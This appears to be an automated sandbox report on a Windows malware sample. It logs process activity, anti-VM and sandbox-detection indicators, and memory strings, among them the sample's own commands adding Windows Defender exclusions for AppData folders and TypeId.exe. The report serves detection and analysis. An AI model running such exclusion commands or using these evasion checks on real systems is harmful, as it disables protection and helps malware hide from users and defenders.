Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: file.exe PID: 7600, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: TypeId.exe PID: 7764, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 8028, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: txxbiwtbs.exe PID: 3624, type: MEMORYSTR
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: powershell.exe, 00000001.00000002.1923913361.00000182B8533000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1923913361.00000182B84FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1923913361.00000182B84C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.0000021117C28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.00000211179B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.0000021117C54000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: + ... S\APPDATA\LOCAL\TEMP\; ADD-MPPREFERENCE -EXCLUSIONPROCESS TYPEID.EXE;
Source: TypeId.exe, 00000003.00000002.1838711068.0000000001650000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\WINDOWS\TEMP\ASLLOG_DETECTORSTRACE_TYPEID.EXE_7764.TXT
Source: powershell.exe, 00000001.00000002.1923913361.00000182B80BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.000002111782E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: TYPEID.EXE;
Source: powershell.exe, 00000001.00000002.1923913361.00000182B84FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1923913361.00000182B84C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.00000211179B1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: JOB COMMAND = ADD-MPPREFERENCE -EXCLUSIONPROCESS TYPEID.EXE;
Source: TypeId.exe, 00000003.00000002.1837907312.0000000001480000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\WINDOWS\SYSTEM32\C:\USERS\user\APPDATA\LOCAL\REGISTEREDCHANNELS\HWRTALNMJ\TYPEID.EXEC:\USERS\user\APPDATA\LOCAL\REGISTEREDCHANNELS\HWRTALNMJ\TYPEID.EXEC:\USERS\user\APPDATA\LOCAL\REGISTEREDCHANNELS\HWRTALNMJ\TYPEID.EXEWINSTA0\DEFAULT
Source: file.exe, 00000000.00000002.1783142050.00000000069E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1789825347.000000000778E000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1841950156.0000000003689000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1835768754.00000000012F7000.00000004.00000010.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1838711068.000000000165E000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1838711068.0000000001650000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1838711068.00000000016DB000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1841950156.00000000034A4000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1838711068.0000000001684000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1837654824.0000000001460000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1838711068.0000000001696000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\USERS\user\APPDATA\LOCAL\REGISTEREDCHANNELS\HWRTALNMJ\TYPEID.EXE
Source: file.exe, 00000000.00000002.1782217190.0000000006932000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1941849554.0000000006880000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\C:\USERS\user\APPDATA\LOCAL\REGISTEREDCHANNELS\HWRTALNMJ\TYPEID.EXE
Source: file.exe, 00000000.00000002.1761959990.0000000001275000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <COMMAND>C:\USERS\user\APPDATA\LOCAL\REGISTEREDCHANNELS\HWRTALNMJ\TYPEID.EXE/COMMAND>
Source: TypeId.exe, 00000003.00000002.1838711068.0000000001650000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\WINDOWS\TEMP\ASLLOG_SHIMDEBUGLOG_TYPEID.EXE_7764.TXTHXE
Source: TypeId.exe, 00000003.00000002.1941849554.0000000006880000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\USERS\user\APPDATA\LOCAL\REGISTEREDCHANNELS\HWRTALNMJ\TYPEID.EXE.CONFIG$
Source: TypeId.exe, 00000003.00000002.1841950156.00000000034A4000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1841950156.00000000032A9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: TYPEID.EXELRFQ
Source: file.exe, 00000000.00000002.1763526633.0000000003AB8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: D-MPPREFERENCE -EXCLUSIONPATH C:\USERS\user\APPDATA\LOCAL,C:\USERS\user\APPDATA\LOCAL\TEMP\; ADD-MPPREFERENCE -EXCLUSIONPROCESS TYPEID.EXE;
Source: TypeId.exe, 00000003.00000002.1838711068.000000000165E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\USERS\user\APPDATA\LOCAL\REGISTEREDCHANNELS\HWRTALNMJ\TYPEID.EXES
Source: TypeId.exe, 00000003.00000002.1838711068.0000000001650000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\WINDOWS\SYSTEM32\C:\USERS\user\APPDATA\LOCAL\REGISTEREDCHANNELS\HWRTALNMJ\TYPEID.EXEC:\USERS\user\APPDATA\LOCAL\REGISTEREDCHANNELS\HWRTALNMJ\TYPEID.EXEC:\USERS\user\APPDATA\LOCAL\REGISTEREDCHANNELS\HWRTALNMJ\TYPEID.EXEWINSTA0\DEFAULTALLUSERSPROFILE=C:\PROGRAMDATAAPPDATA=C:\USERS\user\APPDATA\ROAMINGCOMMONPROGRAMFILES=C:\PROGRAM FILES\COMMON FILESCOMMONPROGRAMFILES(X86)=C:\PROGRAM FILES (X86)\COMMON FILESCOMMONPROGRAMW6432=C:\PROGRAM FILES\COMMON FILESCOMPUTERNAME=user-PCCOMSPEC=C:\WINDOWS\SYSTEM32\CMD.EXEDRIVERDATA=C:\WINDOWS\SYSTEM32\DRIVERS\DRIVERDATAHOMEDRIVE=C:HOMEPATH=\USERS\userLOCALAPPDATA=C:\USERS\user\APPDATA\LOCALLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=2ONEDRIVE=C:\USERS\user\ONEDRIVEOS=WINDOWS_NTPATH=C:\PROGRAM FILES (X86)\COMMON FILES\ORACLE\JAVA\JAVAPATH;C:\WINDOWS\SYSTEM32;C:\WINDOWS;C:\WINDOWS\SYSTEM32\WBEM;C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\;C:\WINDOWS\SYSTEM32\OPENSSH\;C:\USERS\user\APPDATA\LOCAL\MICROSOFT\WINDOWSAPPSPATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=INTEL64 FAMILY 6 MODEL 143 STEPPING 8, GENUINEINTELPROCESSOR_LEVEL=6PROCESSOR_REVISION=8F08PROGRAMDATA=C:\PROGRAMDATAPROGRAMFILES=C:\PROGRAM FILESPROGRAMFILES(X86)=C:\PROGRAM FILES (X86)PROGRAMW6432=C:\PROGRAM FILESPSMODULEPATH=%PROGRAMFILES(X86)%\WINDOWSPOWERSHELL\MODULES;C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\MODULES;C:\PROGRAM FILES (X86)\AUTOIT3\AUTOITXPUBLIC=C:\USERS\PUBLICSYSTEMDRIVE=C:SYSTEMROOT=C:\WINDOWSTEMP=C:\USERS\user\APPDATA\LOCAL\TEMPTMP=C:\USERS\user\APPDATA\LOCAL\TEMPUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\USERS\userWINDIR=C:\WINDOWS
Source: TypeId.exe, 00000003.00000002.1838711068.0000000001696000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FILE:///C:/USERS/user/APPDATA/LOCAL/REGISTEREDCHANNELS/HWRTALNMJ/TYPEID.EXEK
Source: powershell.exe, 00000001.00000002.1923913361.00000182B8533000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.0000021117C54000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: RENCE -EXCLUSIONPROCESS TYPEID.EXE;
Source: TypeId.exe, 00000003.00000002.1838711068.0000000001696000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: TYPEID.EXEW
Source: TypeId.exe, 00000003.00000002.1841950156.0000000003121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $FQKC:\USERS\user\APPDATA\LOCAL\REGISTEREDCHANNELS\HWRTALNMJ\TYPEID.EXE.CONFIG
Source: powershell.exe, 00000006.00000002.1908721371.000002111782E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: JOB COMMAND = ADD-MPPREFERENCE -EXCLUSIONPROCESS TYPEID.EXE;EFENDER\MSFT_MPPREFERENCE CIM OBJECT. OPERATION FAILED WITH THE FOLLOWING ERROR: 0X%1!X!6BA. OPERATION: MPPREFERENCE. TARGET: CONFIGLISTEXTENSION.
Source: powershell.exe, 00000001.00000002.1923913361.00000182B80BC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: JOB COMMAND = ADD-MPPREFERENCE -EXCLUSIONPROCESS TYPEID.EXE;EFENDER\MSFT_MPPREFERENCE CIM OBJECT. OPERATION FAILED WITH THE FOLLOWING ERROR: 0X%1!X!
Source: file.exe, 00000000.00000002.1763526633.00000000033C0000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1841950156.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2976520133.000000000309D000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.1995844689.00000000029BF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL0SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILURE
Source: TypeId.exe, 00000003.00000002.1941849554.0000000006880000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1838711068.0000000001696000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\USERS\user\APPDATA\LOCAL\REGISTEREDCHANNELS\HWRTALNMJ\TYPEID.EXE.CONFIG
Source: TypeId.exe, 00000003.00000002.1838711068.000000000165E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PEID.EXE.CONFIG
Source: powershell.exe, 00000001.00000002.1923913361.00000182B8533000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1923913361.00000182B84FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.0000021117C28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.00000211179B1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ES\APPDATA\LOCAL\TEMP\; ADD-MPPREFERENCE -EXCLUSIONPROCESS TYPEID.EXE;
Source: TypeId.exe, 00000003.00000002.1841950156.00000000032A9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\USERS\user\APPDATA\LOCAL\REGISTEREDCHANNELS\HWRTALNMJ\TYPEID.EXEH
